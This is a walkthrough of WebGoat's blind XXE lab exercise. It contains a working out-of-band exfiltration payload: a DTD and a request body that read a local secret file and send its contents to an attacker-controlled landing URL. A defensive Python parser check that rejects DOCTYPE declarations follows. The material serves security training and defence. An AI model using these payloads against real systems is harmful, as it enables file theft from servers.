XXE (11)

Blind XXE assignment

In the previous page we showed how you can make a server issue a request (a "ping") with an XXE attack. In this assignment, try to write a DTD that uploads the contents of a file, secret.txt, from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD. The secret.txt file is located on the WebGoat server at the location below, so you do not need to scan all directories and files:

OS: Linux
Location: /home/webgoat/.webgoat-v8.0.0-SNAPSHOT//XXE/secret.txt

Try to upload this file using the WebWolf landing page, for example: http://localhost:9090/landing?text=contents_file (NOTE: this endpoint is under your full control). Once you have obtained the contents of the file, post it as a new comment on the page and you will solve the lesson.

Solution

💡 This assignment is more complicated: you need to upload the contents of a file to the attacker's site (WebWolf in this case).
💡 In this case you cannot combine external entities with internal entities.
💡 Use parameter entities to perform the attack; see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
💡 An example DTD can be found here: https://raw.githubusercontent.com/PiAil/pwning-webgoat/master/images/example.dtd; include this DTD in the XML comment.
💡 Use the following for the comment, and remember to replace the URL accordingly: [%remote;]>test&send;

  • Upload contents_file.dtd to WebWolf.

  • Open the Development Tools in the browser, and go to the Network tab.

  • On WebGoat, post a comment.

  • Locate the request to the blind endpoint in the Network tab and click on Edit and Resend.

  • Edit the body of the request as specified below.

contents_file.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://host:port/landing?%file;' >" >%all;

Request Body

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-8.0.0.M25/XXE/secret.txt" >
<!ENTITY % dtd SYSTEM "http://host:port/files/username/contents_file.dtd" >
%dtd;]>
<comment>
<text>test&send;</text>
</comment>
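Seen from the server side, as an added example that is not part of this walkthrough or of WebGoat: a Python check (standard-library expat) that parses a comment body without ever resolving parameter entities, records what the DTD declared, and rejects any body carrying a DOCTYPE, which is the fix this lesson is built around. The sample bodies, the attacker host name and the file path are constructed placeholders.

```python
import xml.parsers.expat as expat

# Constructed sample bodies for the comment endpoint (placeholder host and path,
# not real traffic). The second mirrors the shape of the request body above.
BENIGN_COMMENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<comment><text>nice article</text></comment>"""

BLIND_XXE_COMMENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % file SYSTEM "file:///path/to/secret.txt" >
<!ENTITY % dtd SYSTEM "http://attacker.example/files/contents_file.dtd" >
%dtd;]>
<comment><text>test&send;</text></comment>"""


def analyse_xml(data: bytes) -> dict:
    """Parse with expat while never fetching anything external, and record
    what the DTD tried to declare so the rejection can be logged."""
    report = {"doctype": None, "entities": [], "error": None}
    parser = expat.ParserCreate()
    # Parameter entities (%dtd;) are what pull the remote DTD in; refusing to
    # expand them means neither the local file nor the remote URL is ever read.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        report["entities"].append({"name": name, "parameter": bool(is_param), "system_id": sysid})

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:  # malformed input is reported, not propagated
        report["error"] = str(exc)
    return report


def reject_reason(data: bytes):
    """Policy for untrusted XML: no DOCTYPE at all (what disallow-doctype-decl
    does in Java parsers). Returns None to accept, otherwise the reason to log."""
    report = analyse_xml(data)
    if report["doctype"] is None:
        return None
    external = [e for e in report["entities"] if e["system_id"]]
    if external:
        names = ", ".join(("%" if e["parameter"] else "") + e["name"] for e in external)
        return f"DOCTYPE with external entities ({names})"
    return "DOCTYPE present"
```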
